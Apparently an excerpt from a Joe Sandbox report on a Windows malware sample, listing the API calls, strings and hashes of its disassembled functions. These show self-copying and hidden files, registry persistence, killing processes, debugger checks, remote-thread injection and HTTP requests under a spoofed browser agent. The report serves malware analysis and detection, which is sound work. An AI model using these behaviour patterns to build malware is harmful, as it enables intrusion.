                                                                                                                                                                                                                        Function 00007FF6DAD73890 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6DAD73750
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73710: GetVolumeInformationW.KERNELBASE ref: 00007FF6DAD737CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73710: wsprintfW.USER32 ref: 00007FF6DAD7386E
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD738D9
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD738EE
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73901
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73911
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73924
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73939
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD7394C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73961
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 7c7c7247d549d9e37f092b5a31a3711d0059d00c133cc5beb443fd3bd3c84089
                                                                                                                                                                                                                        • Instruction ID: 6466558fd046e1cc4d6d04a66f46f1865e8ab2bf6c60f3025a904fe40bdb7a61
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c7c7247d549d9e37f092b5a31a3711d0059d00c133cc5beb443fd3bd3c84089
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21115131A2CA8285DB648F29F86436E6361FBC4745F505172DA4FC7A2ADF3CD058C740
                                                                                                                                                                                                                        Function 00007FF6DAD73A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6DAD73750
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73710: GetVolumeInformationW.KERNELBASE ref: 00007FF6DAD737CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73710: wsprintfW.USER32 ref: 00007FF6DAD7386E
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD738D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD738EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73901
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73911
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73924
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73939
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD7394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73961
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF6DAD73A85
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF6DAD73A90
                                                                                                                                                                                                                        • CopyFileW.KERNELBASE ref: 00007FF6DAD73AA9
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF6DAD73AC1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: eb4493f17a959604dfb05488033e14cb6fbd039b0084e85697ddad03d65a5255
                                                                                                                                                                                                                        • Instruction ID: 75d3df4ccbfacb4455cfd00655e6f627690311d1f5001df60fc7423d99659c50
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb4493f17a959604dfb05488033e14cb6fbd039b0084e85697ddad03d65a5255
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01D661F1C44293EB54DB24E4543AE63A0FB90704FA04173D24FC35AAEE3CC259CB40
                                                                                                                                                                                                                        Function 00007FF6DAD73710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction ID: 1c0f60e7d31786baa7f9596e3ae59ce0cda1a5299dfa7b0a69f1ac28fbc5256c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F831F526A1C6C1C6D720DF64E4983AFB3A0FB84740F50122AE68EC7A59EF7DC559CB00
                                                                                                                                                                                                                        Function 00007FF6DAD731B8 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction ID: c53fa24c6a3bdc89bf9b8544f3fabd7cedb8f7d9cfe7e712ae6dec0ae8d23e90
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70F05E21D0C28381E7384B28980833E2BA0FB45709F6403F6D59FC6596CF2CD569CB11
                                                                                                                                                                                                                        Function 00007FF6DAD714EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 416 7ff6dad714ec-7ff6dad71528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: c81c921b3ec84ebfb79c316fa377a2e10ba3ddfa12c6ccaf407aca8efca7a8fb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E09276908F80C6C6209B15F84001EB7B4FBC8795F604225EACD82B28CF3CC1A5CB00
                                                                                                                                                                                                                        Function 00007FF6DAD73B20 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 420 7ff6dad73b20-7ff6dad73b46 VirtualAlloc
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                        • Opcode ID: 99f7d4ad0234b598d10cda1f958cd0c548c533684dba80b324c491c4e2f5f85d
                                                                                                                                                                                                                        • Instruction ID: 71adc2bb56dc2bbe3b9a9e0fbaed5f1db133a3a25c2112a359392967176f1f2a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99f7d4ad0234b598d10cda1f958cd0c548c533684dba80b324c491c4e2f5f85d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCC012B1F2514087D71C9F21E451A0E2A10A744741F504029DA4257744CD3DC1514F00
                                                                                                                                                                                                                        Function 00007FF6DAD73AF0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 417 7ff6dad73af0-7ff6dad73aff 418 7ff6dad73b14-7ff6dad73b18 417->418 419 7ff6dad73b01-7ff6dad73b0e VirtualFree 417->419 419->418
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction ID: 7ea8b60b169e0b311f9071792ee145b353e11460ce7100ee12c0e9bfb16d50b0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02D01221F3C98181EB98DB26E88971DA2A0FBC4744F508176EA8A81965CF3CC0E9CF00

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF6DAD710D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: 434d1b2552d877a44f24dc5e77c9452434c7cb48255dbf6b41c440d02b8df143
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8671FA3290CB8186E7748B15E44436EB7A0FB84784F504376EA8EC6BA9DF7CD499CB41
                                                                                                                                                                                                                        Function 00007FF6DAD7216C Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6DAD721A9
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction ID: ec7512e094cb9683bf884371224628d0c1e0296769738828d490d0ed7e32ab78
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F71EA3291CA81C2E7548F55F85472EB760FBC4795F20117AEA8F83A69CF7CD8948B40
                                                                                                                                                                                                                        Function 00007FF6DAD74530 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction ID: a5ef5f9cb2fa25d0c35062d62bedb57447ba54286d64b189d9d9f5876f1c90d7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47810C76A0CB8182EB54CB55F44436EB7A0FBC9B95F104236DA9E83B69DF3CD4948B00
                                                                                                                                                                                                                        Function 00007FF6DAD73078 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD74410: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD730B3), ref: 00007FF6DAD74458
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD74410: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD730B3), ref: 00007FF6DAD74495
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD74410: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD730B3), ref: 00007FF6DAD744A0
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73B50: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD730B8), ref: 00007FF6DAD73B93
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73B50: RegSetValueExW.ADVAPI32 ref: 00007FF6DAD73BC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73B50: RegCloseKey.ADVAPI32 ref: 00007FF6DAD73BD8
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73BF0: RegDeleteKeyW.ADVAPI32 ref: 00007FF6DAD73C08
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6DAD73E03
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: Process32FirstW.KERNEL32 ref: 00007FF6DAD73E36
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: CloseHandle.KERNEL32 ref: 00007FF6DAD73E48
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: wcscmp.MSVCRT ref: 00007FF6DAD73E5D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: OpenProcess.KERNEL32 ref: 00007FF6DAD73E73
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: TerminateProcess.KERNEL32 ref: 00007FF6DAD73E96
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: CloseHandle.KERNEL32 ref: 00007FF6DAD73EA4
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: Process32NextW.KERNEL32 ref: 00007FF6DAD73EB7
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73DF0: CloseHandle.KERNEL32 ref: 00007FF6DAD73EC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73980: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6DAD73AD8), ref: 00007FF6DAD739B0
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF6DAD73162
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
